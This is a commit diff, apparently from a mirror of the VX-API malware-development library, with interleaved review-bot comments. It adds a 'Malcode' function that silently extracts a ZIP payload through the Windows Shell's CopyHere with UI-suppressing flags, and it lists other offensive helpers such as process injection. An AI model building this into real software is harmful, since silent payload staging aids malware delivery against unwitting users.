mirror of https://github.com/vxunderground/VX-API
parent
e47dccad19
commit
0f0f9aab4c
@ -23,3 +23,5 @@ x64/Debug/VX-API.exe
|
|||
*.iobj
|
||||
*.ipdb
|
||||
*.exe
|
||||
VX-API/x64/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cpp
|
||||
VX-API/x64/Debug/VX-API.vcxproj.AssemblyReference.cache
|
||||
|
|
|
@ -161,6 +161,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
|
||||
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |
|
||||
| MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu | Malcode |
|
||||
| UrlDownloadToFileSynchronous | Hans Passant | Networking |
|
||||
| ConvertIPv4IpAddressStructureToString | smelly__vx | Networking |
|
||||
| ConvertIPv4StringToUnsignedLong | smelly__vx | Networking |
|
||||
|
|
|
@ -20,7 +20,9 @@ INT main(VOID)
|
|||
Pii.MethodEnum = E_QUEUE_USER_APC;
|
||||
|
||||
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
ProcessInjectionMain(&Pii);
|
||||
//ProcessInjectionMain(&Pii);
|
||||
|
||||
MpfExtractMaliciousPayloadFromZipFileW((PWCHAR)L"C:\\Users\\dwThr\\Desktop\\Test.zip", (PWCHAR)L"C:\\Users\\dwThr\\Desktop\\");
|
||||
|
||||
return dwError;
|
||||
}
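Review bot: The new call `MpfExtractMaliciousPayloadFromZipFileW(...)` does not match the function this commit defines and declares, `MpfExtractMaliciousPayloadFromZipFileNoPasswordW`, so unless a wrapper by the shorter name exists outside this diff the line will not compile or link. It also hard-codes a developer profile path (`C:\Users\dwThr\Desktop\Test.zip`) into the checked-in entry point and discards the BOOL result, so `dwError` is returned unchanged even when extraction fails. Suggest `if (!MpfExtractMaliciousPayloadFromZipFileNoPasswordW((PWCHAR)L"...", (PWCHAR)L"...")) dwError = ERROR_GEN_FAILURE;` (the function surfaces no HRESULT, so only a generic code is available) and reading the two paths from a command-line argument rather than a fixed user directory. The body of `main` begins before this hunk.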
|
||||
|
|
|
@ -0,0 +1,174 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
//Microsoft doesn't natively support password protected ZIP files. Hahahaha
|
||||
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordW(_In_ PWCHAR FullPathToZip, _In_ PWCHAR FullPathToExtractionDirectory)
|
||||
{
|
||||
IDispatch* Items = 0;
|
||||
IShellDispatch* Dispatch = 0L;
|
||||
Folder* ZippedFile = 0L;
|
||||
Folder* Destination = 0L;
|
||||
FolderItems* FilesInside = 0L;
|
||||
LONG NumberOfFiles = ERROR_SUCCESS;
|
||||
HRESULT Result = S_OK;
|
||||
VARIANT Options, OutFolder, InZipFile, Item;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitialize(NULL)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (PVOID*)&Dispatch);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
InZipFile.vt = VT_BSTR;
|
||||
InZipFile.bstrVal = FullPathToZip;
|
||||
|
||||
Result = Dispatch->NameSpace(InZipFile, &ZippedFile);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OutFolder.vt = VT_BSTR;
|
||||
OutFolder.bstrVal = FullPathToExtractionDirectory;
|
||||
|
||||
Result = Dispatch->NameSpace(OutFolder, &Destination);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = ZippedFile->Items(&FilesInside);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = FilesInside->get_Count(&NumberOfFiles);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (NumberOfFiles < 1)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = FilesInside->QueryInterface(IID_IDispatch, (PVOID*)&Items);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Item.vt = VT_DISPATCH;
|
||||
Item.pdispVal = Items;
|
||||
Options.vt = VT_I4;
|
||||
Options.lVal = 1024 | 512 | 16 | 4;
|
||||
|
||||
Result = Destination->CopyHere(Item, Options);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if(Items)
|
||||
Items->Release();
|
||||
|
||||
if(FilesInside)
|
||||
FilesInside->Release();
|
||||
|
||||
if(Destination)
|
||||
Destination->Release();
|
||||
|
||||
if(ZippedFile)
|
||||
ZippedFile->Release();
|
||||
|
||||
if (Dispatch)
|
||||
Dispatch->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordA(_In_ PCHAR FullPathToZip, _In_ PCHAR FullPathToExtractionDirectory)
|
||||
{
|
||||
IDispatch* Items = 0;
|
||||
IShellDispatch* Dispatch = 0L;
|
||||
Folder* ZippedFile = 0L;
|
||||
Folder* Destination = 0L;
|
||||
FolderItems* FilesInside = 0L;
|
||||
LONG NumberOfFiles = ERROR_SUCCESS;
|
||||
HRESULT Result = S_OK;
|
||||
VARIANT Options, OutFolder, InZipFile, Item;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
WCHAR Source[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
WCHAR CopyDestination[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
if (CharStringToWCharString(Source, FullPathToZip, MAX_PATH * sizeof(WCHAR)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CharStringToWCharString(CopyDestination, FullPathToExtractionDirectory, MAX_PATH * sizeof(WCHAR)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(Result = CoInitialize(NULL)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (PVOID*)&Dispatch);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
InZipFile.vt = VT_BSTR;
|
||||
InZipFile.bstrVal = Source;
|
||||
|
||||
Result = Dispatch->NameSpace(InZipFile, &ZippedFile);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OutFolder.vt = VT_BSTR;
|
||||
OutFolder.bstrVal = CopyDestination;
|
||||
|
||||
Result = Dispatch->NameSpace(OutFolder, &Destination);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = ZippedFile->Items(&FilesInside);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = FilesInside->get_Count(&NumberOfFiles);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (NumberOfFiles < 1)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = FilesInside->QueryInterface(IID_IDispatch, (PVOID*)&Items);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Item.vt = VT_DISPATCH;
|
||||
Item.pdispVal = Items;
|
||||
Options.vt = VT_I4;
|
||||
Options.lVal = 1024 | 512 | 16 | 4;
|
||||
|
||||
Result = Destination->CopyHere(Item, Options);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (Items)
|
||||
Items->Release();
|
||||
|
||||
if (FilesInside)
|
||||
FilesInside->Release();
|
||||
|
||||
if (Destination)
|
||||
Destination->Release();
|
||||
|
||||
if (ZippedFile)
|
||||
ZippedFile->Release();
|
||||
|
||||
if (Dispatch)
|
||||
Dispatch->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return bFlag;
|
||||
}
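Review bot: Both functions call `CoUninitialize()` unconditionally in EXIT_ROUTINE, including on paths where CoInitialize never succeeded — the `if (!SUCCEEDED(Result = CoInitialize(NULL)))` branch in each, and in the A variant the two `CharStringToWCharString` failures that jump to EXIT_ROUTINE before COM is touched — so an RPC_E_CHANGED_MODE result on a thread already initialized in another apartment would be followed by an unbalanced CoUninitialize. Track it with `BOOL ComInitialized = FALSE;`, set `ComInitialized = TRUE;` immediately after the CoInitialize check (S_FALSE is a success code and still needs the matching release), and make the cleanup `if (ComInitialized) CoUninitialize();`. Separately, `InZipFile.bstrVal` and `OutFolder.bstrVal` are assigned raw WCHAR pointers rather than `SysAllocString` results, so any consumer that reads the BSTR length prefix would see garbage, and `Folder::CopyHere` is widely reported to run asynchronously for zip namespaces, which would make `bFlag = TRUE` mean "queued" rather than "extracted" — worth a comment above `return bFlag;` either way. The mask `1024 | 512 | 16 | 4` would read better as the named FOF_NOERRORUI | FOF_NOCONFIRMMKDIR | FOF_NOCONFIRMATION | FOF_SILENT constants, presumably the values intended; verify against shellapi.h.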
|
|
@ -44,6 +44,7 @@
|
|||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v143</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<CLRSupport>false</CLRSupport>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
|
@ -105,6 +106,7 @@
|
|||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp20</LanguageStandard>
|
||||
<CompileAsManaged>false</CompileAsManaged>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
|
@ -237,6 +239,7 @@
|
|||
<ClCompile Include="IsRegistryKeyValid.cpp" />
|
||||
<ClCompile Include="LdrLoadGetProcedureAddress.cpp" />
|
||||
<ClCompile Include="MemoryFindMemory.cpp" />
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFile.cpp" />
|
||||
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp" />
|
||||
<ClCompile Include="Main.cpp" />
|
||||
<ClCompile Include="ManualResourceDataFetching.cpp" />
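Review bot: The `<CLRSupport>false</CLRSupport>` and `<CompileAsManaged>false</CompileAsManaged>` additions land only in groups whose context is the Debug|x64 configuration (`<UseDebugLibraries>true`, `_DEBUG;_CONSOLE`), and no hunk touches the Release|x64 groups that follow. Unless Release already carries both settings outside this diff, the two configurations will now differ in managed-code handling; mirroring the two lines into the Release PropertyGroup and ClCompile group would keep them consistent.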
|
||||
|
|
|
@ -552,6 +552,9 @@
|
|||
<ClCompile Include="MiscGenericShellcodePayloads.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -363,7 +363,8 @@ BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In
|
|||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii);
|
||||
BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
|
||||
BOOL MpfProcessInjectionViaCreateRemoteThread(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordW(_In_ PWCHAR FullPathToZip, _In_ PWCHAR FullPathToExtractionDirectory);
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordA(_In_ PCHAR FullPathToZip, _In_ PCHAR FullPathToExtractionDirectory);
|
||||
|
||||
|
||||
|
||||
|
|